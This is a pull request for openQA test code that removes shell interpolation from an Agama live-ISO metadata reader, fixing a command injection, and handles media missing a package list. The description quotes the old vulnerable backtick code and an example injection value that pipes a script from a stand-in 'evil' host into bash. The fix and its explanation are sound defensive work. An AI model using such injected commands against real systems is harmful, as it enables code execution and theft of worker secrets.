### PR TITLE
Re-apply ISO extraction refactor, handle missing .packages.json.gz

### DIFF
--- a/lib/Yam/Agama/LiveIso.pm
+++ b/lib/Yam/Agama/LiveIso.pm
@@ -20,7 +20,6 @@ use strict;
 use warnings;
 use v5.20;
 use feature qw(signatures);
-no warnings qw(experimental::signatures);
 use testapi;
 use Mojo::JSON qw(decode_json);
 use File::Temp qw(tempfile);

--- a/lib/Yam/Agama/LiveIso.pm
+++ b/lib/Yam/Agama/LiveIso.pm
@@ -4,6 +4,13 @@
 # Summary: Live ISO class to retrieve ISO data
 # Maintainer: QE Installation and Migration (QE Iam) <none@suse.de>
 
+=head1 Yam::Agama::LiveIso
+
+C<Yam::Agama::LiveIso> - Retrieve Agama Live ISO metadata (image info and
+package versions) and expose it through openQA variables.
+
+=cut
+
 package Yam::Agama::LiveIso;
 
 use base Exporter;
@@ -11,60 +18,125 @@ use Exporter;
 use base 'opensusebasetest';
 use strict;
 use warnings;
+use v5.20;
+use feature qw(signatures);
+no warnings qw(experimental::signatures);
 use testapi;
+use Mojo::JSON qw(decode_json);
+use File::Temp qw(tempfile);
 
 our @EXPORT = qw(read_live_iso);
 
-sub read_iso_info {
-    my $iso_info = `isoinfo -j UTF-8 -R -x /LiveOS/.info -i @{[ get_var('ISO') ]}`;
-    die "Error getting info from ISO image" if ($? != 0);
-    return $iso_info;
+=head2 _run_and_slurp
+
+ _run_and_slurp($errmsg, @cmd);
+
+Run C<@cmd> as a child process and return its slurped output. C<@cmd> is passed
+as a LIST, so no shell is spawned and its arguments can never be parsed as shell
+syntax (command injection fix, poo#202788). Dies with C<$errmsg> if the command
+exits non-zero.
+
+=cut
+
+sub _run_and_slurp ($errmsg, @cmd) {
+    open(my $fh, '-|', @cmd) or die "Cannot run $cmd[0]: $!";
+    binmode $fh;
+    my $data = do { local $/; <$fh> };
+    close $fh;
+    die $errmsg if $? != 0;
+    return $data;
 }
 
-sub get_package_version {
-    my ($package_name) = @_;
-    my $command = "isoinfo -j UTF-8 -R -x /LiveOS/.packages.json.gz -i @{[ get_var('ISO') ]}" .
-      " | gunzip" .
-      " | jq -r '.[] | select(.name==\"$package_name\") | .version'";
+=head2 _write_tempfile
 
-    my $version = qx{$command};
-    chomp($version);
-    return $version;
+ _write_tempfile($content, $suffix);
+
+Write binary C<$content> to a temporary file (auto-removed at exit) and return
+its path. C<$suffix> defaults to C<.tmp>.
+
+=cut
+
+sub _write_tempfile ($content, $suffix = '.tmp') {
+    my ($fh, $path) = tempfile(SUFFIX => $suffix, UNLINK => 1);
+    binmode $fh;
+    print {$fh} $content;
+    close $fh;
+    return $path;
 }
 
-sub parse_agama_packages {
-    my @packages = qw(agama agama-autoinstall agama-cli agama-web-ui);
-    my %versions = map { $_ => get_package_version($_) } @packages;
-    die "Error getting Agama packages info from ISO image" if ($? != 0);
+=head2 _isoinfo_extract
 
-    # Set each package version as environment variable
-    set_var('AGAMA_PACKAGE_VERSION', $versions{'agama'} || '17+0');
-    set_var('AGAMA_AUTOINSTALL_PACKAGE_VERSION', $versions{'agama-autoinstall'} || '17+0');
-    set_var('AGAMA_CLI_PACKAGE_VERSION', $versions{'agama-cli'} || '17+0');
-    set_var('AGAMA_WEBUI_PACKAGE_VERSION', $versions{'agama-web-ui'} || '17+0');
-    join("\n", map { $_ . " => " . ($versions{$_} || '17+0') } keys %versions);
+ _isoinfo_extract($member, $errmsg);
+
+Extract C<$member> from the ISO (C<get_var('ISO')>) via C<isoinfo> and return
+its content. Dies with C<$errmsg> on failure. Returns an empty string, without
+dying, if C<$member> is not present on the ISO (isoinfo exits 0 with no output
+in that case).
+
+=cut
+
+sub _isoinfo_extract ($member, $errmsg) {
+    return _run_and_slurp($errmsg,
+        'isoinfo', '-j', 'UTF-8', '-R', '-x', $member, '-i', get_var('ISO'));
 }
 
-sub record_agama_info {
-    my ($info, $pkgs, $major_version) = @_;
+sub read_iso_info () {
+    return _isoinfo_extract('/LiveOS/.info', 'Error getting info from ISO image');
+}
+
+=head2 _read_packages_json
+
+ _read_packages_json();
+
+Read C</LiveOS/.packages.json.gz> (a gzipped JSON array of C<{name, version,
+...}>) from the ISO, decompress it via the C<gunzip> binary over a temp file (no
+shell pipe, deadlock-free) and return the decoded arrayref. Some media (e.g. the
+Online medium) don't ship this file at all; isoinfo then returns empty output
+rather than failing, so that case is treated as "no package info available"
+instead of a decompression error.
+
+=cut
+
+sub _read_packages_json () {
+    my $gz = _isoinfo_extract('/LiveOS/.packages.json.gz',
+        'Error getting Agama packages info from ISO image');
+    return [] unless length $gz;
+    my $tpath = _write_tempfile($gz, '.json.gz');
+    my $json = _run_and_slurp('Error decompressing Agama packages info',
+        'gunzip', '-c', $tpath);
+    return decode_json($json);
+}
+
+sub parse_agama_packages () {
+    my %env_var = (
+        AGAMA_PACKAGE_VERSION => 'agama',
+        AGAMA_AUTOINSTALL_PACKAGE_VERSION => 'agama-autoinstall',
+        AGAMA_CLI_PACKAGE_VERSION => 'agama-cli',
+        AGAMA_WEBUI_PACKAGE_VERSION => 'agama-web-ui',
+    );
+    my %version = map { $_->{name} => $_->{version} } @{_read_packages_json()};
+
+    set_var($_, $version{$env_var{$_}} || '17+0') for keys %env_var;
+    join "\n", map { "$_ => " . ($version{$_} || '17+0') } sort values %env_var;
+}
+
+sub record_agama_info ($info, $pkgs, $major_version) {
     record_info('AGAMA INFO',
         "ENV vars:\n" .
           "AGAMA_VERSION=$major_version\n\n" .
-          "ISO info:\n" .
-          $info . "\n" .
-          "Version of packages:\n" .
-          $pkgs
-    );
+          "ISO info:\n$info\n" .
+          "Version of packages:\n$pkgs");
 }
 
-sub read_live_iso {
+sub read_live_iso () {
     return unless get_var('ISO');
     my $info = read_iso_info();
     my $pkgs = parse_agama_packages();
     $info =~ /^Image.version:\s+(?<major_version>\d+\.\w+)\./m;
     # Agama version was not available yet on GM medium, so we inject the default value
-    set_var("AGAMA_VERSION", $+{'major_version'} // '17.0');
-    record_agama_info($info, $pkgs, ($+{'major_version'} || '17.0'));
+    my $major = $+{major_version} // '17.0';
+    set_var('AGAMA_VERSION', $major);
+    record_agama_info($info, $pkgs, $major);
 }
 
 1;


### PR DESCRIPTION
This is a follow-up to #26143, which was reverted in #26437.

## Rationale (unchanged from #26143):

**Risk of RCE / command injection in Yam::Agama::LiveIso**

`LiveIso.pm` built shell command strings by interpolating the ISO job variable, then ran them with qx{} / backticks:
```Perl
my $iso_info = `isoinfo ... -i @{[ get_var('ISO') ]}`;
my $version  = qx{isoinfo ... -i @{[ get_var('ISO') ]} | gunzip | jq ...};
```

`qx{}` hands the whole string to `/bin/sh -c`, so ISO was interpreted as shell syntax, not a filename. Anyone who can set ISO — i.e. anyone able to schedule or `openqa-clone-job` a job, no commit rights needed — could inject arbitrary commands:

```bash
ISO='x; curl http://evil/x.sh | bash'   → runs on the openQA worker as the worker user
```
Impact: remote code execution on the worker host (not the SUT), reachable on every Agama scenario across all arches. Workers hold registration secrets, cloud/SSH keys, and run jobs for many products — so one job's payload could pivot into shared infra.

## The fix

Same as #26143: eliminate the shell invocation entirely. All external calls use list-form `open '-|', 'isoinfo', ... / 'gunzip', ...`, where each argument is passed directly to `execvp`. So ISO can only ever be a literal filename, never parsed as syntax. The `jq + shell` pipe was dropped: the gzipped package list is decompressed with the `gunzip` binary over a temp file and parsed in-process with `Mojo::JSON`.

## Why it was reverted, and what changed

#26437 reverted #26143 because moving `gunzip` out of the shell pipeline surfaced a bug that used to be silently masked: on the Online medium, `/LiveOS/.packages.json.gz` doesn't exist. `isoinfo` exits `0` with empty output in that case (confirmed empirically against a real ISO). In the old shell pipeline, `gunzip` failed on that empty input, but its exit status was overwritten by `jq` (the last command in the pipe), so the failure was invisible and the code silently fell through to the `'17+0'` version defaults. Once `gunzip` ran standalone, its failure was no longer swallowed, and the job died with `Error decompressing Agama packages info` instead of falling back — see the discussion on #26437 (@alvarocarvajald, @Vogtinator).

This PR adds the missing explicit handling: `_read_packages_json` now checks for empty `isoinfo` output *before* attempting to decompress, and treats it as "this medium doesn't ship the file" rather than a decompression error:

```Perl
sub _read_packages_json () {
    my $gz = _isoinfo_extract('/LiveOS/.packages.json.gz',
        'Error getting Agama packages info from ISO image');
    return [] unless length $gz;
    ...
}
```

This restores the old fallback behaviour (package versions default to `'17+0'`) for media that legitimately don't ship the file, while still treating a genuinely corrupt/undecompressable `.packages.json.gz` (non-empty but broken) as a real error — that distinction is what #26437 was missing.

Verified separately that a missing *ISO file itself* (bad `get_var('ISO')`) still exits non-zero from `isoinfo` and is still caught by the existing `die $errmsg if $? != 0` check — only the "member absent inside a valid ISO" case is silently zero-exit, and that's exactly the case this PR now handles.

## Side benefits (unchanged from #26143)

- Fetch + decompress + parse now happen once instead of 4× (was one subprocess trio per package).
- Dropped the external jq dependency.
- Behaviour unchanged: same AGAMA_* variables, same defaults, same public read_live_iso contract.

- Related ticket: https://progress.opensuse.org/issues/202788
- Needles: n/a
- Verification runs:
   - https://openqa.suse.de/tests/24025954
   - https://openqa.suse.de/tests/24025955
   - https://openqa.suse.de/tests/24025956
   - https://openqa.suse.de/tests/24025957
   - https://openqa.suse.de/tests/24025958
   - https://openqa.suse.de/tests/24025959
   - https://openqa.suse.de/tests/24025960
   - https://openqa.suse.de/tests/24025961
   - https://openqa.suse.de/tests/24025962